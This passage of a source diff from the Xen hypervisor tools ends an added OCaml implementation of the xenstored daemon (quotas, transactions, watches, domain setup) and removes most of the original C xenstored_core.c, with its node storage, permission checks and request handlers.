self#options.Option.quota_num_watches_per_domain
+    then self#watches#add watch
+    else raise (Constants.Xs_error (Constants.E2BIG, 
"Xenstored.xenstored#add_watch", "Too many watches"))
+  method commit transaction =
+    try
+      List.iter (domain_entry_change self#domains) 
(self#transactions#domain_entries transaction);
+      Transaction.fire_watches self#watches (self#transactions#commit 
transaction);
+      true
+    with _ -> false
+  method domain_entry_count transaction (domain_id : int) =
+    let entries = try self#domains#entry_count 
transaction.Transaction.domain_id with Not_found -> 0 in
+    try
+      let transaction_entries = (List.find (fun entry -> entry.Transaction.id 
= transaction.Transaction.domain_id) (self#transactions#domain_entries 
transaction)).Transaction.entries in
+      transaction_entries + entries
+    with Not_found -> entries
+  method domain_entry_decr store transaction path =
+    let domain_id = (List.hd (self#permissions#get store 
path)).Permission.domain_id in
+    if Domain.is_unprivileged_id domain_id then
+      if transaction.Transaction.transaction_id <> 0l
+      then self#transactions#domain_entry_decr transaction domain_id
+      else self#domains#entry_decr domain_id
+  method domain_entry_incr store transaction path =
+    let domain_id = (List.hd (self#permissions#get store 
path)).Permission.domain_id in
+    if Domain.is_unprivileged_id domain_id then
+      if transaction.Transaction.transaction_id <> 0l
+      then (
+        self#transactions#domain_entry_incr transaction domain_id;
+        let entry_count = (List.find (fun entry -> entry.Transaction.id = 
domain_id) (self#transactions#domain_entries transaction)).Transaction.entries 
in
+        let entry_count_current = try self#domains#entry_count domain_id with 
Not_found -> 0 in
+        if entry_count + entry_count_current > 
self#options.Option.quota_num_entries_per_domain
+        then (
+          self#transactions#domain_entry_decr transaction domain_id;
+          raise (Constants.Xs_error (Constants.EINVAL, 
"Xenstored.xenstored#domain_entry_incr", path))
+        )
+      )
+      else (
+        self#domains#entry_incr domain_id;
+        let entry_count = self#domains#entry_count domain_id in
+        if entry_count > self#options.Option.quota_num_entries_per_domain
+        then (
+          self#domains#entry_decr domain_id;
+          raise (Constants.Xs_error (Constants.EINVAL, 
"Xenstored.xenstored#domain_entry_incr", path))
+        )
+      )
+  method domains = m_domains
+  method initialise_domains =
+    if self#options.Option.domain_init
+    then (
+      if Domain.xc_handle = Constants.null_file_descr then Utils.barf_perror 
"Failed to open connection to hypervisor\n";
+      Eventchan.init ();
+      let dom0 =
+        if self#options.Option.separate_domain
+        then (
+          self#add_domain (domxs_init (Os.get_domxs_id ()));
+          Domain.domu_init 0 (Os.get_dom0_port ()) (Os.get_dom0_mfn ()) true
+        )
+        else domxs_init 0 in
+      m_virq_port <- Eventchan.bind_virq Constants.virq_dom_exc;
+      if m_virq_port = Constants.null_file_descr then Utils.barf_perror 
"Failed to bind to domain exception virq port\n";
+      self#add_domain dom0;
+      Eventchan.get_channel ()
+    )
+    else Constants.null_file_descr
+  method initialise_store =
+    let path = Store.root_path ^ "tool" ^ Store.dividor_str ^ "xenstored" in
+    self#store#create_node path;
+    self#permissions#add self#store path 0
+  method new_transaction domain store =
+    if not (Domain.is_unprivileged domain) || 
self#transactions#num_transactions_for_domain domain#id < 
self#options.Option.quota_max_transaction
+    then self#transactions#new_transaction domain store
+    else raise (Constants.Xs_error (Constants.ENOSPC, 
"Xenstored.xenstored#new_transaction", "Too many transactions"))
+  method options = m_options
+  method permissions = m_permissions
+  method remove_domain domain =
+    self#domains#remove domain;
+    Trace.destroy domain#id "connection";
+    self#watches#remove_watches domain;
+    self#transactions#remove_domain domain
+  method transactions = m_transactions
+  method virq_port = m_virq_port
+  method watches = m_watches
+end
diff -r 10a8fae412c5 tools/xenstore/xenstored_core.c
--- a/tools/xenstore/xenstored_core.c   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,1987 +0,0 @@
-/* 
-    Simple prototype Xen Store Daemon providing simple tree-like database.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/socket.h>
-#include <sys/select.h>
-#include <sys/un.h>
-#include <sys/time.h>
-#include <time.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <stdbool.h>
-#include <stdio.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <syslog.h>
-#include <string.h>
-#include <errno.h>
-#include <dirent.h>
-#include <getopt.h>
-#include <signal.h>
-#include <assert.h>
-#include <setjmp.h>
-
-#include "utils.h"
-#include "list.h"
-#include "talloc.h"
-#include "xs_lib.h"
-#include "xenstored_core.h"
-#include "xenstored_watch.h"
-#include "xenstored_transaction.h"
-#include "xenstored_domain.h"
-#include "xenctrl.h"
-#include "tdb.h"
-
-#include "hashtable.h"
-
-extern int xce_handle; /* in xenstored_domain.c */
-
-static bool verbose = false;
-LIST_HEAD(connections);
-static int tracefd = -1;
-static bool recovery = true;
-static bool remove_local = true;
-static int reopen_log_pipe[2];
-static char *tracefile = NULL;
-static TDB_CONTEXT *tdb_ctx;
-
-static void corrupt(struct connection *conn, const char *fmt, ...);
-static void check_store(void);
-
-#define log(...)                                                       \
-       do {                                                            \
-               char *s = talloc_asprintf(NULL, __VA_ARGS__);           \
-               trace("%s\n", s);                                       \
-               syslog(LOG_ERR, "%s",  s);                              \
-               talloc_free(s);                                         \
-       } while (0)
-
-
-int quota_nb_entry_per_domain = 1000;
-int quota_nb_watch_per_domain = 128;
-int quota_max_entry_size = 2048; /* 2K */
-int quota_max_transaction = 10;
-
-TDB_CONTEXT *tdb_context(struct connection *conn)
-{
-       /* conn = NULL used in manual_node at setup. */
-       if (!conn || !conn->transaction)
-               return tdb_ctx;
-       return tdb_transaction_context(conn->transaction);
-}
-
-bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb)
-{
-       if (rename(newname, xs_daemon_tdb()) != 0)
-               return false;
-       tdb_close(tdb_ctx);
-       tdb_ctx = talloc_steal(talloc_autofree_context(), newtdb);
-       return true;
-}
-
-static char *sockmsg_string(enum xsd_sockmsg_type type)
-{
-       switch (type) {
-       case XS_DEBUG: return "DEBUG";
-       case XS_DIRECTORY: return "DIRECTORY";
-       case XS_READ: return "READ";
-       case XS_GET_PERMS: return "GET_PERMS";
-       case XS_WATCH: return "WATCH";
-       case XS_UNWATCH: return "UNWATCH";
-       case XS_TRANSACTION_START: return "TRANSACTION_START";
-       case XS_TRANSACTION_END: return "TRANSACTION_END";
-       case XS_INTRODUCE: return "INTRODUCE";
-       case XS_RELEASE: return "RELEASE";
-       case XS_GET_DOMAIN_PATH: return "GET_DOMAIN_PATH";
-       case XS_WRITE: return "WRITE";
-       case XS_MKDIR: return "MKDIR";
-       case XS_RM: return "RM";
-       case XS_SET_PERMS: return "SET_PERMS";
-       case XS_WATCH_EVENT: return "WATCH_EVENT";
-       case XS_ERROR: return "ERROR";
-       case XS_IS_DOMAIN_INTRODUCED: return "XS_IS_DOMAIN_INTRODUCED";
-       case XS_RESUME: return "RESUME";
-       case XS_SET_TARGET: return "SET_TARGET";
-       default:
-               return "**UNKNOWN**";
-       }
-}
-
-void trace(const char *fmt, ...)
-{
-       va_list arglist;
-       char *str;
-       char sbuf[1024];
-       int ret, dummy;
-
-       if (tracefd < 0)
-               return;
-
-       /* try to use a static buffer */
-       va_start(arglist, fmt);
-       ret = vsnprintf(sbuf, 1024, fmt, arglist);
-       va_end(arglist);
-
-       if (ret <= 1024) {
-               dummy = write(tracefd, sbuf, ret);
-               return;
-       }
-
-       /* fail back to dynamic allocation */
-       va_start(arglist, fmt);
-       str = talloc_vasprintf(NULL, fmt, arglist);
-       va_end(arglist);
-       dummy = write(tracefd, str, strlen(str));
-       talloc_free(str);
-}
-
-static void trace_io(const struct connection *conn,
-                    const struct buffered_data *data,
-                    int out)
-{
-       unsigned int i;
-       time_t now;
-       struct tm *tm;
-
-#ifdef HAVE_DTRACE
-       dtrace_io(conn, data, out);
-#endif
-
-       if (tracefd < 0)
-               return;
-
-       now = time(NULL);
-       tm = localtime(&now);
-
-       trace("%s %p %04d%02d%02d %02d:%02d:%02d %s (",
-             out ? "OUT" : "IN", conn,
-             tm->tm_year + 1900, tm->tm_mon + 1,
-             tm->tm_mday, tm->tm_hour, tm->tm_min, tm->tm_sec,
-             sockmsg_string(data->hdr.msg.type));
-       
-       for (i = 0; i < data->hdr.msg.len; i++)
-               trace("%c", (data->buffer[i] != '\0') ? data->buffer[i] : ' ');
-       trace(")\n");
-}
-
-void trace_create(const void *data, const char *type)
-{
-       trace("CREATE %s %p\n", type, data);
-}
-
-void trace_destroy(const void *data, const char *type)
-{
-       trace("DESTROY %s %p\n", type, data);
-}
-
-/**
- * Signal handler for SIGHUP, which requests that the trace log is reopened
- * (in the main loop).  A single byte is written to reopen_log_pipe, to awaken
- * the select() in the main loop.
- */
-static void trigger_reopen_log(int signal __attribute__((unused)))
-{
-       char c = 'A';
-       int dummy;
-       dummy = write(reopen_log_pipe[1], &c, 1);
-}
-
-
-static void reopen_log(void)
-{
-       if (tracefile) {
-               if (tracefd > 0)
-                       close(tracefd);
-
-               tracefd = open(tracefile, O_WRONLY|O_CREAT|O_APPEND, 0600);
-
-               if (tracefd < 0)
-                       perror("Could not open tracefile");
-               else
-                       trace("\n***\n");
-       }
-}
-
-
-static bool write_messages(struct connection *conn)
-{
-       int ret;
-       struct buffered_data *out;
-
-       out = list_top(&conn->out_list, struct buffered_data, list);
-       if (out == NULL)
-               return true;
-
-       if (out->inhdr) {
-               if (verbose)
-                       xprintf("Writing msg %s (%.*s) out to %p\n",
-                               sockmsg_string(out->hdr.msg.type),
-                               out->hdr.msg.len,
-                               out->buffer, conn);
-               ret = conn->write(conn, out->hdr.raw + out->used,
-                                 sizeof(out->hdr) - out->used);
-               if (ret < 0)
-                       return false;
-
-               out->used += ret;
-               if (out->used < sizeof(out->hdr))
-                       return true;
-
-               out->inhdr = false;
-               out->used = 0;
-
-               /* Second write might block if non-zero. */
-               if (out->hdr.msg.len && !conn->domain)
-                       return true;
-       }
-
-       ret = conn->write(conn, out->buffer + out->used,
-                         out->hdr.msg.len - out->used);
-       if (ret < 0)
-               return false;
-
-       out->used += ret;
-       if (out->used != out->hdr.msg.len)
-               return true;
-
-       trace_io(conn, out, 1);
-
-       list_del(&out->list);
-       talloc_free(out);
-
-       return true;
-}
-
-static int destroy_conn(void *_conn)
-{
-       struct connection *conn = _conn;
-
-       /* Flush outgoing if possible, but don't block. */
-       if (!conn->domain) {
-               fd_set set;
-               struct timeval none;
-
-               FD_ZERO(&set);
-               FD_SET(conn->fd, &set);
-               none.tv_sec = none.tv_usec = 0;
-
-               while (!list_empty(&conn->out_list)
-                      && select(conn->fd+1, NULL, &set, NULL, &none) == 1)
-                       if (!write_messages(conn))
-                               break;
-               close(conn->fd);
-       }
-        if (conn->target)
-                talloc_unlink(conn, conn->target);
-       list_del(&conn->list);
-       trace_destroy(conn, "connection");
-       return 0;
-}
-
-
-static void set_fd(int fd, fd_set *set, int *max)
-{
-       if (fd < 0)
-               return;
-       FD_SET(fd, set);
-       if (fd > *max)
-               *max = fd;
-}
-
-
-static int initialize_set(fd_set *inset, fd_set *outset, int sock, int ro_sock,
-                         struct timeval **ptimeout)
-{
-       static struct timeval zero_timeout = { 0 };
-       struct connection *conn;
-       int max = -1;
-
-       *ptimeout = NULL;
-
-       FD_ZERO(inset);
-       FD_ZERO(outset);
-
-       set_fd(sock,               inset, &max);
-       set_fd(ro_sock,            inset, &max);
-       set_fd(reopen_log_pipe[0], inset, &max);
-
-       if (xce_handle != -1)
-               set_fd(xc_evtchn_fd(xce_handle), inset, &max);
-
-       list_for_each_entry(conn, &connections, list) {
-               if (conn->domain) {
-                       if (domain_can_read(conn) ||
-                           (domain_can_write(conn) &&
-                            !list_empty(&conn->out_list)))
-                               *ptimeout = &zero_timeout;
-               } else {
-                       set_fd(conn->fd, inset, &max);
-                       if (!list_empty(&conn->out_list))
-                               FD_SET(conn->fd, outset);
-               }
-       }
-
-       return max;
-}
-
-static int destroy_fd(void *_fd)
-{
-       int *fd = _fd;
-       close(*fd);
-       return 0;
-}
-
-/* Is child a subnode of parent, or equal? */
-bool is_child(const char *child, const char *parent)
-{
-       unsigned int len = strlen(parent);
-
-       /* / should really be "" for this algorithm to work, but that's a
-        * usability nightmare. */
-       if (streq(parent, "/"))
-               return true;
-
-       if (strncmp(child, parent, len) != 0)
-               return false;
-
-       return child[len] == '/' || child[len] == '\0';
-}
-
-/* If it fails, returns NULL and sets errno. */
-static struct node *read_node(struct connection *conn, const char *name)
-{
-       TDB_DATA key, data;
-       uint32_t *p;
-       struct node *node;
-       TDB_CONTEXT * context = tdb_context(conn);
-
-       key.dptr = (void *)name;
-       key.dsize = strlen(name);
-       data = tdb_fetch(context, key);
-
-       if (data.dptr == NULL) {
-               if (tdb_error(context) == TDB_ERR_NOEXIST)
-                       errno = ENOENT;
-               else {
-                       log("TDB error on read: %s", tdb_errorstr(context));
-                       errno = EIO;
-               }
-               return NULL;
-       }
-
-       node = talloc(name, struct node);
-       node->name = talloc_strdup(node, name);
-       node->parent = NULL;
-       node->tdb = tdb_context(conn);
-       talloc_steal(node, data.dptr);
-
-       /* Datalen, childlen, number of permissions */
-       p = (uint32_t *)data.dptr;
-       node->num_perms = p[0];
-       node->datalen = p[1];
-       node->childlen = p[2];
-
-       /* Permissions are struct xs_permissions. */
-       node->perms = (void *)&p[3];
-       /* Data is binary blob (usually ascii, no nul). */
-       node->data = node->perms + node->num_perms;
-       /* Children is strings, nul separated. */
-       node->children = node->data + node->datalen;
-
-       return node;
-}
-
-static bool write_node(struct connection *conn, const struct node *node)
-{
-       /*
-        * conn will be null when this is called from manual_node.
-        * tdb_context copes with this.
-        */
-
-       TDB_DATA key, data;
-       void *p;
-
-       key.dptr = (void *)node->name;
-       key.dsize = strlen(node->name);
-
-       data.dsize = 3*sizeof(uint32_t)
-               + node->num_perms*sizeof(node->perms[0])
-               + node->datalen + node->childlen;
-
-       if (domain_is_unprivileged(conn) && data.dsize >= quota_max_entry_size)
-               goto error;
-
-       data.dptr = talloc_size(node, data.dsize);
-       ((uint32_t *)data.dptr)[0] = node->num_perms;
-       ((uint32_t *)data.dptr)[1] = node->datalen;
-       ((uint32_t *)data.dptr)[2] = node->childlen;
-       p = data.dptr + 3 * sizeof(uint32_t);
-
-       memcpy(p, node->perms, node->num_perms*sizeof(node->perms[0]));
-       p += node->num_perms*sizeof(node->perms[0]);
-       memcpy(p, node->data, node->datalen);
-       p += node->datalen;
-       memcpy(p, node->children, node->childlen);
-
-       /* TDB should set errno, but doesn't even set ecode AFAICT. */
-       if (tdb_store(tdb_context(conn), key, data, TDB_REPLACE) != 0) {
-               corrupt(conn, "Write of %s failed", key.dptr);
-               goto error;
-       }
-       return true;
- error:
-       errno = ENOSPC;
-       return false;
-}
-
-static enum xs_perm_type perm_for_conn(struct connection *conn,
-                                      struct xs_permissions *perms,
-                                      unsigned int num)
-{
-       unsigned int i;
-       enum xs_perm_type mask = XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER;
-
-       if (!conn->can_write)
-               mask &= ~XS_PERM_WRITE;
-
-       /* Owners and tools get it all... */
-       if (!conn->id || perms[0].id == conn->id
-                || (conn->target && perms[0].id == conn->target->id))
-               return (XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER) & mask;
-
-       for (i = 1; i < num; i++)
-               if (perms[i].id == conn->id
-                        || (conn->target && perms[i].id == conn->target->id))
-                       return perms[i].perms & mask;
-
-       return perms[0].perms & mask;
-}
-
-static char *get_parent(const char *node)
-{
-       char *slash = strrchr(node + 1, '/');
-       if (!slash)
-               return talloc_strdup(node, "/");
-       return talloc_asprintf(node, "%.*s", (int)(slash - node), node);
-}
-
-/* What do parents say? */
-static enum xs_perm_type ask_parents(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       do {
-               name = get_parent(name);
-               node = read_node(conn, name);
-               if (node)
-                       break;
-       } while (!streq(name, "/"));
-
-       /* No permission at root?  We're in trouble. */
-       if (!node)
-               corrupt(conn, "No permissions file at root");
-
-       return perm_for_conn(conn, node->perms, node->num_perms);
-}
-
-/* We have a weird permissions system.  You can allow someone into a
- * specific node without allowing it in the parents.  If it's going to
- * fail, however, we don't want the errno to indicate any information
- * about the node. */
-static int errno_from_parents(struct connection *conn, const char *node,
-                             int errnum, enum xs_perm_type perm)
-{
-       /* We always tell them about memory failures. */
-       if (errnum == ENOMEM)
-               return errnum;
-
-       if (ask_parents(conn, node) & perm)
-               return errnum;
-       return EACCES;
-}
-
-/* If it fails, returns NULL and sets errno. */
-struct node *get_node(struct connection *conn,
-                     const char *name,
-                     enum xs_perm_type perm)
-{
-       struct node *node;
-
-       if (!name || !is_valid_nodename(name)) {
-               errno = EINVAL;
-               return NULL;
-       }
-       node = read_node(conn, name);
-       /* If we don't have permission, we don't have node. */
-       if (node) {
-               if ((perm_for_conn(conn, node->perms, node->num_perms) & perm)
-                   != perm) {
-                       errno = EACCES;
-                       node = NULL;
-               }
-       }
-       /* Clean up errno if they weren't supposed to know. */
-       if (!node) 
-               errno = errno_from_parents(conn, name, errno, perm);
-       return node;
-}
-
-static struct buffered_data *new_buffer(void *ctx)
-{
-       struct buffered_data *data;
-
-       data = talloc_zero(ctx, struct buffered_data);
-       if (data == NULL)
-               return NULL;
-       
-       data->inhdr = true;
-       return data;
-}
-
-/* Return length of string (including nul) at this offset.
- * If there is no nul, returns 0 for failure.
- */
-static unsigned int get_string(const struct buffered_data *data,
-                              unsigned int offset)
-{
-       const char *nul;
-
-       if (offset >= data->used)
-               return 0;
-
-       nul = memchr(data->buffer + offset, 0, data->used - offset);
-       if (!nul)
-               return 0;
-
-       return nul - (data->buffer + offset) + 1;
-}
-
-/* Break input into vectors, return the number, fill in up to num of them.
- * Always returns the actual number of nuls in the input.  Stores the
- * positions of the starts of the nul-terminated strings in vec.
- * Callers who use this and then rely only on vec[] will
- * ignore any data after the final nul.
- */
-unsigned int get_strings(struct buffered_data *data,
-                        char *vec[], unsigned int num)
-{
-       unsigned int off, i, len;
-
-       off = i = 0;
-       while ((len = get_string(data, off)) != 0) {
-               if (i < num)
-                       vec[i] = data->buffer + off;
-               i++;
-               off += len;
-       }
-       return i;
-}
-
-void send_reply(struct connection *conn, enum xsd_sockmsg_type type,
-               const void *data, unsigned int len)
-{
-       struct buffered_data *bdata;
-
-       /* Message is a child of the connection context for auto-cleanup. */
-       bdata = new_buffer(conn);
-       bdata->buffer = talloc_array(bdata, char, len);
-
-       /* Echo request header in reply unless this is an async watch event. */
-       if (type != XS_WATCH_EVENT) {
-               memcpy(&bdata->hdr.msg, &conn->in->hdr.msg,
-                      sizeof(struct xsd_sockmsg));
-       } else {
-               memset(&bdata->hdr.msg, 0, sizeof(struct xsd_sockmsg));
-       }
-
-       /* Update relevant header fields and fill in the message body. */
-       bdata->hdr.msg.type = type;
-       bdata->hdr.msg.len = len;
-       memcpy(bdata->buffer, data, len);
-
-       /* Queue for later transmission. */
-       list_add_tail(&bdata->list, &conn->out_list);
-}
-
-/* Some routines (write, mkdir, etc) just need a non-error return */
-void send_ack(struct connection *conn, enum xsd_sockmsg_type type)
-{
-       send_reply(conn, type, "OK", sizeof("OK"));
-}
-
-void send_error(struct connection *conn, int error)
-{
-       unsigned int i;
-
-       for (i = 0; error != xsd_errors[i].errnum; i++) {
-               if (i == ARRAY_SIZE(xsd_errors) - 1) {
-                       eprintf("xenstored: error %i untranslatable", error);
-                       i = 0;  /* EINVAL */
-                       break;
-               }
-       }
-       send_reply(conn, XS_ERROR, xsd_errors[i].errstring,
-                         strlen(xsd_errors[i].errstring) + 1);
-}
-
-static bool valid_chars(const char *node)
-{
-       /* Nodes can have lots of crap. */
-       return (strspn(node, 
-                      "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-                      "abcdefghijklmnopqrstuvwxyz"
-                      "0123456789-/_@") == strlen(node));
-}
-
-bool is_valid_nodename(const char *node)
-{
-       /* Must start in /. */
-       if (!strstarts(node, "/"))
-               return false;
-
-       /* Cannot end in / (unless it's just "/"). */
-       if (strends(node, "/") && !streq(node, "/"))
-               return false;
-
-       /* No double //. */
-       if (strstr(node, "//"))
-               return false;
-
-       if (strlen(node) > XENSTORE_ABS_PATH_MAX)
-               return false;
-
-       return valid_chars(node);
-}
-
-/* We expect one arg in the input: return NULL otherwise.
- * The payload must contain exactly one nul, at the end.
- */
-static const char *onearg(struct buffered_data *in)
-{
-       if (!in->used || get_string(in, 0) != in->used)
-               return NULL;
-       return in->buffer;
-}
-
-static char *perms_to_strings(const void *ctx,
-                             struct xs_permissions *perms, unsigned int num,
-                             unsigned int *len)
-{
-       unsigned int i;
-       char *strings = NULL;
-       char buffer[MAX_STRLEN(unsigned int) + 1];
-
-       for (*len = 0, i = 0; i < num; i++) {
-               if (!xs_perm_to_string(&perms[i], buffer, sizeof(buffer)))
-                       return NULL;
-
-               strings = talloc_realloc(ctx, strings, char,
-                                        *len + strlen(buffer) + 1);
-               strcpy(strings + *len, buffer);
-               *len += strlen(buffer) + 1;
-       }
-       return strings;
-}
-
-char *canonicalize(struct connection *conn, const char *node)
-{
-       const char *prefix;
-
-       if (!node || (node[0] == '/') || (node[0] == '@'))
-               return (char *)node;
-       prefix = get_implicit_path(conn);
-       if (prefix)
-               return talloc_asprintf(node, "%s/%s", prefix, node);
-       return (char *)node;
-}
-
-bool check_event_node(const char *node)
-{
-       if (!node || !strstarts(node, "@")) {
-               errno = EINVAL;
-               return false;
-       }
-       return true;
-}
-
-static void send_directory(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_READ);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       send_reply(conn, XS_DIRECTORY, node->children, node->childlen);
-}
-
-static void do_read(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_READ);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       send_reply(conn, XS_READ, node->data, node->datalen);
-}
-
-static void delete_node_single(struct connection *conn, struct node *node)
-{
-       TDB_DATA key;
-
-       key.dptr = (void *)node->name;
-       key.dsize = strlen(node->name);
-
-       if (tdb_delete(tdb_context(conn), key) != 0) {
-               corrupt(conn, "Could not delete '%s'", node->name);
-               return;
-       }
-       domain_entry_dec(conn, node);
-}
-
-/* Must not be / */
-static char *basename(const char *name)
-{
-       return strrchr(name, '/') + 1;
-}
-
-static struct node *construct_node(struct connection *conn, const char *name)
-{
-       const char *base;
-       unsigned int baselen;
-       struct node *parent, *node;
-       char *children, *parentname = get_parent(name);
-
-       /* If parent doesn't exist, create it. */
-       parent = read_node(conn, parentname);
-       if (!parent)
-               parent = construct_node(conn, parentname);
-       if (!parent)
-               return NULL;
-
-       if (domain_entry(conn) >= quota_nb_entry_per_domain)
-               return NULL;
-
-       /* Add child to parent. */
-       base = basename(name);
-       baselen = strlen(base) + 1;
-       children = talloc_array(name, char, parent->childlen + baselen);
-       memcpy(children, parent->children, parent->childlen);
-       memcpy(children + parent->childlen, base, baselen);
-       parent->children = children;
-       parent->childlen += baselen;
-
-       /* Allocate node */
-       node = talloc(name, struct node);
-       node->tdb = tdb_context(conn);
-       node->name = talloc_strdup(node, name);
-
-       /* Inherit permissions, except domains own what they create */
-       node->num_perms = parent->num_perms;
-       node->perms = talloc_memdup(node, parent->perms,
-                                   node->num_perms * sizeof(node->perms[0]));
-       if (conn && conn->id)
-               node->perms[0].id = conn->id;
-
-       /* No children, no data */
-       node->children = node->data = NULL;
-       node->childlen = node->datalen = 0;
-       node->parent = parent;
-       domain_entry_inc(conn, node);
-       return node;
-}
-
-static int destroy_node(void *_node)
-{
-       struct node *node = _node;
-       TDB_DATA key;
-
-       if (streq(node->name, "/"))
-               corrupt(NULL, "Destroying root node!");
-
-       key.dptr = (void *)node->name;
-       key.dsize = strlen(node->name);
-
-       tdb_delete(node->tdb, key);
-       return 0;
-}
-
-static struct node *create_node(struct connection *conn, 
-                               const char *name,
-                               void *data, unsigned int datalen)
-{
-       struct node *node, *i;
-
-       node = construct_node(conn, name);
-       if (!node)
-               return NULL;
-
-       node->data = data;
-       node->datalen = datalen;
-
-       /* We write out the nodes down, setting destructor in case
-        * something goes wrong. */
-       for (i = node; i; i = i->parent) {
-               if (!write_node(conn, i)) {
-                       domain_entry_dec(conn, i);
-                       return NULL;
-               }
-               talloc_set_destructor(i, destroy_node);
-       }
-
-       /* OK, now remove destructors so they stay around */
-       for (i = node; i; i = i->parent)
-               talloc_set_destructor(i, NULL);
-       return node;
-}
-
-/* path, data... */
-static void do_write(struct connection *conn, struct buffered_data *in)
-{
-       unsigned int offset, datalen;
-       struct node *node;
-       char *vec[1] = { NULL }; /* gcc4 + -W + -Werror fucks code. */
-       char *name;
-
-       /* Extra "strings" can be created by binary data. */
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       offset = strlen(vec[0]) + 1;
-       datalen = in->used - offset;
-
-       name = canonicalize(conn, vec[0]);
-       node = get_node(conn, name, XS_PERM_WRITE);
-       if (!node) {
-               /* No permissions, invalid input? */
-               if (errno != ENOENT) {
-                       send_error(conn, errno);
-                       return;
-               }
-               node = create_node(conn, name, in->buffer + offset, datalen);
-               if (!node) {
-                       send_error(conn, errno);
-                       return;
-               }
-       } else {
-               node->data = in->buffer + offset;
-               node->datalen = datalen;
-               if (!write_node(conn, node)){
-                       send_error(conn, errno);
-                       return;
-               }
-       }
-
-       add_change_node(conn->transaction, name, false);
-       fire_watches(conn, name, false);
-       send_ack(conn, XS_WRITE);
-}
-
-static void do_mkdir(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_WRITE);
-
-       /* If it already exists, fine. */
-       if (!node) {
-               /* No permissions? */
-               if (errno != ENOENT) {
-                       send_error(conn, errno);
-                       return;
-               }
-               node = create_node(conn, name, NULL, 0);
-               if (!node) {
-                       send_error(conn, errno);
-                       return;
-               }
-               add_change_node(conn->transaction, name, false);
-               fire_watches(conn, name, false);
-       }
-       send_ack(conn, XS_MKDIR);
-}
-
-static void delete_node(struct connection *conn, struct node *node)
-{
-       unsigned int i;
-
-       /* Delete self, then delete children.  If we crash, then the worst
-          that can happen is the children will continue to take up space, but
-          will otherwise be unreachable. */
-       delete_node_single(conn, node);
-
-       /* Delete children, too. */
-       for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) {
-               struct node *child;
-
-               child = read_node(conn, 
-                                 talloc_asprintf(node, "%s/%s", node->name,
-                                                 node->children + i));
-               if (child) {
-                       delete_node(conn, child);
-               }
-               else {
-                       trace("delete_node: No child '%s/%s' found!\n",
-                             node->name, node->children + i);
-                       /* Skip it, we've already deleted the parent. */
-               }
-       }
-}
-
-
-/* Delete memory using memmove. */
-static void memdel(void *mem, unsigned off, unsigned len, unsigned total)
-{
-       memmove(mem + off, mem + off + len, total - off - len);
-}
-
-
-static bool remove_child_entry(struct connection *conn, struct node *node,
-                              size_t offset)
-{
-       size_t childlen = strlen(node->children + offset);
-       memdel(node->children, offset, childlen + 1, node->childlen);
-       node->childlen -= childlen + 1;
-       return write_node(conn, node);
-}
-
-
-static bool delete_child(struct connection *conn,
-                        struct node *node, const char *childname)
-{
-       unsigned int i;
-
-       for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) {
-               if (streq(node->children+i, childname)) {
-                       return remove_child_entry(conn, node, i);
-               }
-       }
-       corrupt(conn, "Can't find child '%s' in %s", childname, node->name);
-       return false;
-}
-
-
-static int _rm(struct connection *conn, struct node *node, const char *name)
-{
-       /* Delete from parent first, then if we crash, the worst that can
-          happen is the child will continue to take up space, but will
-          otherwise be unreachable. */
-       struct node *parent = read_node(conn, get_parent(name));
-       if (!parent) {
-               send_error(conn, EINVAL);
-               return 0;
-       }
-
-       if (!delete_child(conn, parent, basename(name))) {
-               send_error(conn, EINVAL);
-               return 0;
-       }
-
-       delete_node(conn, node);
-       return 1;
-}
-
-
-static void internal_rm(const char *name)
-{
-       char *tname = talloc_strdup(NULL, name);
-       struct node *node = read_node(NULL, tname);
-       if (node)
-               _rm(NULL, node, tname);
-       talloc_free(node);
-       talloc_free(tname);
-}
-
-
-static void do_rm(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_WRITE);
-       if (!node) {
-               /* Didn't exist already?  Fine, if parent exists. */
-               if (errno == ENOENT) {
-                       node = read_node(conn, get_parent(name));
-                       if (node) {
-                               send_ack(conn, XS_RM);
-                               return;
-                       }
-                       /* Restore errno, just in case. */
-                       errno = ENOENT;
-               }
-               send_error(conn, errno);
-               return;
-       }
-
-       if (streq(name, "/")) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (_rm(conn, node, name)) {
-               add_change_node(conn->transaction, name, true);
-               fire_watches(conn, name, true);
-               send_ack(conn, XS_RM);
-       }
-}
-
-
-static void do_get_perms(struct connection *conn, const char *name)
-{
-       struct node *node;
-       char *strings;
-       unsigned int len;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_READ);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
